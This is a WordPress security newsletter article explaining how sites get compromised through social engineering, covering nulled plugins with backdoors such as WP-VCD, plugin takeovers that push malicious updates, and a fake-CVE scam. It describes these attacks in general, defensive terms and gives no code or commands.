Security Weekly

How do WordPress sites get hacked? (Part 3)

Cleanshot 2023 11 30 At 14.14.30

Published:

Cleanshot 2023 11 30 At 14.14.30

Oliver Sild

Patchstack

Oliver Sild is the CEO and Co-founder of Patchstack. He is an entrepreneur and cyber security expert with a strong focus on community building. He has been organising hacking competitions (& local CTF community) in Estonia since 2016, has kickstarted a startup community in his hometown and has nearly 10 years of experience with WordPress security.

Week 4

In the past 2 issues, we’ve talked about the different ways websites are taken over by compromising privileged accounts and by exploiting security vulnerabilities in the WordPress core, plugins and themes.

Sometimes plugins and themes are not just vulnerable, but also intentionally malicious. This week, we’ll look into another common technique that hackers are using to take over websites.

This relies entirely on exploiting the weaknesses of human nature and is also known under the term called social engineering. Social engineering is all about psychology and tricking people do something that they should not be doing.

Nulled WordPress plugins and themes

A very common and widespread technique to take over websites is by making people infect their own site. Hackers get their hands on a premium plugin, from where they usually remove the code that is responsible for licensing checks and then upload them to different websites and forums for people to download it for free.

Hackers have been doing this in an organised manner, where they publish entire libraries of “free premium plugins”. These lists often get ranked by Google, so the people who are looking to download some premium plugins or themes will most likely land on one of such pages.

While those plugins/themes mostly work as expected, the underlying code has more changes to it than just the removed licence checks. They come with backdoors and malware that gives the hacker a complete control over the site.

One such group was called WP-VCD, who systematically published popular nulled plugins and themes for WordPress and used different websites to spread them to as many people as possible. You’ll find technical analysis on WP-VCD nulled plugins malware in the resources below.

Plugins with backdoors

There has been multiple cases where a developer has become tired of maintaining a project and is giving it over to a dev developer. It’s common for hackers to look for such opportunities, so they could take over the plugin and release backdoors with the official update.

Malicious developers can add different functions to create new admin accounts and control the website remotely. We’ve also seen cases in the past where the developer had no malicious intent, but built in a functional backdoor to provide support to the users.

Scams

While nulled plugins and themes are exploiting the urge to save money by giving something for free that you should actually be paying for. There are also scams which exploit other human emotions, such as fear.

A very good example is the recent scam that was impersonating WordPress core team and making claims that WordPress core has a critical vulnerability which needs to be manually patched with a special plugin.

While for many people, it was an obvious scam, there was people even on Reddit who asked for public help to restore the website. It’s also important to note, that many non-technical WordPress users might not even detect that the site got infected after installing the malware.

Conclusion

Hackers take an advantage of known human emotions, both positive (such as excitement for getting something for free) and negative (such as fear for losing something valuable). Unfortunately, there’s no firewall you can apply to human emotions and behaviour.

There are no Robin Hoods who spend their free time and money on making premium software free for the public. They always have a reason why to do that, which comes down to what we covered in the first episode.

Always make sure to get your software only from the trusted sources, and if it’s paid, please support the original developers who put their time and effort into building it. Supporting the developers also keeps them motivated, so there’s less chances the project will be handed over to the wrong hands.

PS! As a reminder, if you wish to get those episodes directly on your email. Here’s a newsletter we created just for that: http://subscribepage.io/patchstack

Stay vigilant and see you next week!

Resources:

An In-Depth Analysis Of The WP-VCD Malware – Patchstack

Fake CVE Phishing Campaign Tricks WordPress Users Into Installing Malware (patchstack.com)

Join the Conversation!

There's a dedicated thread on this post inside of The Admin Bar community. Join in on the conversation, ask questions, and learn more!

Group Thread
Cleanshot 2023 11 30 At 14.14.30

Oliver Sild

Patchstack

Oliver Sild is the CEO and Co-founder of Patchstack. He is an entrepreneur and cyber security expert with a strong focus on community building. He has been organising hacking competitions (& local CTF community) in Estonia since 2016, has kickstarted a startup community in his hometown and has nearly 10 years of experience with WordPress security.

Brought to you by:
Logo

Patchstack auto-mitigates security vulnerabilities found on WordPress core, plugins and themes. Patchstack is the leading vulnerability intelligence provider in the entire WordPress ecosystem and has the largest collection of vulnerability specific vPatch rules that provide precision protection without any performance hit nor false positives. Patchstack is the go-to security provider for many of the leading agencies such as 10up, Valet, SiteCare and others.

Never Miss an Issue!

Subscribe and have Security Weekly delivered to your inbox every week!

Come Join Us!

Join the #1 WordPress Community and dive into conversations covering every aspect of running an agency!

Kyle Van Deusen

Community Manager

More from Security Weekly

Week 21

Why You Should Avoid Nulled WordPress Plugins

Every once and a while, I see a new GPLClub-like marketplace, that is selling nulled premium …

Week 20

Why You Should Avoid Abandoned WordPress Plugins

Something that has been coming up a lot lately is the issue of abandoned WordPress plugins …

Week 19

How to Automate WordPress Security for Care Plans

In the previous two issues of Security Weekly we’ve talked about the importance of WordPress maintenance …